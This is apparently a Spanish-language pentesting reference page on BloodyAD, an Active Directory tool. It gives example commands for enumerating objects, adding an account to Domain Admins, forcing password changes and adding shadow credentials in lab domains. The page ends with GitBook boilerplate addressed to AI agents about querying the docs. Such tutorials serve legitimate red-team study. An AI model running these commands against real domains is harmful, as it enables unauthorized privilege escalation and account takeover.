> For the complete documentation index, see [llms.txt](https://securitylayer.gitbook.io/securitylayer/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://securitylayer.gitbook.io/securitylayer/pentesting-tools/tools/bloodyad.md). # BloodyAD Ver maquinas: [***Fluffy***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/fluffy.md) ***(HTB)*** BloodyAD es una herramienta utilizada para el movimiento lateral y la escalada de privilegios en entornos de Active Directory. A diferencia de otras herramientas que dependen estrictamente de protocolos específicos, bloodyAD aprovecha la API de Active Directory (vía LDAP/SAMR) para realizar ataques de gestión de objetos sin necesidad de herramientas pesadas de Windows. Su propósito principal en un ejercicio de Red Team es la manipulación de objetos de AD (usuarios, grupos, GPOs) cuando ya contamos con credenciales o un ticket de Kerberos. Es especialmente útil para: * Abuso de ACLs/ACEs: Si tienes permisos de `GenericWrite` o `WriteDacl` sobre un objeto. * Escalada de privilegios: Añadir usuarios a grupos privilegiados de forma quirúrgica. * Ataques de Relevo (Relay): Modificar atributos de objetos tras un envenenamiento exitoso. #### ***Comandos Principales y Casos de Uso*** La sintaxis de bloodyAD sigue un patrón lógico: \ `bloodyAD -u -p -d -host `. **1. Enumeración de privilegios (**`GetObjectAttributes`**)** Antes de actuar, necesitamos saber qué podemos hacer. Este comando lista atributos específicos de un objeto: {% code expandable="true" %} ``` bloodyAD -u 'pwn-user' -p 'P@ssword123' -d 'corp.local' -host '10.10.10.100' getObjectAttributes 'CN=AdminUser,CN=Users,DC=corp,DC=local' description ``` {% endcode %} **2. Añadir un usuario a un grupo (**`addObjectsGroup`**)** Si tus privilegios te permiten modificar la membresía de un grupo (ej. *Domain Admins* o *Backup Operators*): {% code expandable="true" %} ``` bloodyAD -u 'attacker' -p 'P@ssword!' -d 'contoso.com' -host '10.10.10.5' addObjectsGroup 'CN=attacker,CN=Users,DC=contoso,DC=com' 'CN=Domain Admins,CN=Users,DC=contoso,DC=com' ``` {% endcode %} **3. Cambio de contraseña (**`setPassword`**)** Útil si tienes permisos de `ForceChangePassword` sobre un objetivo de alto valor. {% code expandable="true" %} ``` bloodyAD -u 'operator' -p 'Creds123' -d 'lab.local' -host '10.10.10.10' setPassword 'CN=TargetUser,CN=Users,DC=lab,DC=local' 'NewSecurePass123!' ``` {% endcode %} **4. Shadow Credentials (**`addShadowCredentials`**)** Una técnica de persistencia y escalada moderna que aprovecha el atributo `msDS-KeyCredentialLink`. {% code expandable="true" %} ``` bloodyAD -u 'operator' -p 'password' -d 'internal.corp' -host '10.1.1.5' addShadowCredentials 'CN=TargetComputer,OU=Servers,DC=internal,DC=corp' ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://securitylayer.gitbook.io/securitylayer/pentesting-tools/tools/bloodyad.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.